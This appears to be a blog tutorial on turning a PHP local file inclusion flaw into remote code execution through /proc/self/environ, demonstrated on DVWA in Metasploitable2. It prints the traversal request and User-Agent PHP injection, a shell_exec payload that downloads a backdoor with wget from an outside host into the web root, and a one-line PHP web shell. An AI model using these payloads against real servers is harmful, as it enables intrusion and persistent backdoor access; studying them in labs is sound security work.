Exploiting Local File Inclusion (LFI ) vulnerability with /proc/self/environ method | LFI Attacks
In this post we are going to see, how an attacker can exploit LFI vulnerability to to achieve code execution by the use of /proc/self/environ method.
What is /proc/self/environ LFI Method ?
In Linux based system the environment-variables of the current process (self) can be accessed via /proc/self/environ. One of the environment-variables set (if apache2 is running) is the user-agent which can be controlled through a HTTP request. If the /proc/self/environ file can be accessed through LFI, then in this case RCE can be achieved by requesting the file in combination with the payload written into the HTTP User-Agent field.
GET lfi.php?file=../../../proc/self/environ HTTP/1.1
User-Agent: <?php phpinfo();?>Now if an attacker sends the above http request to the web server then :
- First the data on User-Agent field will written on the
/proc/self/environfile. - Then the page request
lfi.php?file=../../../proc/self/environwill include the content of/proc/self/environfile into the output page and our payload is get executed.
In this way a local file inclusion vulnerability can be leveraged to Remote Code Execution. Now lets see an example of it. For demonstration i am going to use Metasploitable2 VM with DVWA, You can download Metasploitable2.
In DVWA web application, we are going to use File Inclusion page with low security setting.
/dvwa/vulnerabilities/fi/?page=file1.php
Now there is LFI vulnerability in page input.
Now lets try to include /proc/self/environ file.
And it gets included in the output page, means it is also vulnerable to /proc/self/environ attack. Now we just just have to modify the User-Agent header field of the request body, and it can be done by using any browser proxies like Burp Suite, ZAP proxy or you can also use temper data plugin on firefox. I am going to use Burp proxy.
Now first we are going to check weather our injected code will execute or not, and for this the payload will be :
<?php phpinfo();?>And our request body will be :
Response output :
And it works, means we successfully got executed our code on the web server. Now we are going to use the below payload :
<?php shell_exec('wget http://192.168.56.1:8000/shell.php -O /var/www/shell.php');?>The above php code will download backdoor file shell.php and store it on the web root directory (/var/www/), at here i am using a simple python http server to host backdoor file, in real world scenerio you can use the any web servers to host the backdoor file. The code used for php backdoor `shell.php is :
<?php
$cmd = $_GET['cmd'];
system($cmd);
?>Now lets try the above payload.
Now lets try to access our backdoor.
And it works. In case if User Agent field is filtered by web application, then you can also inject php code within Accept-Encoding field.
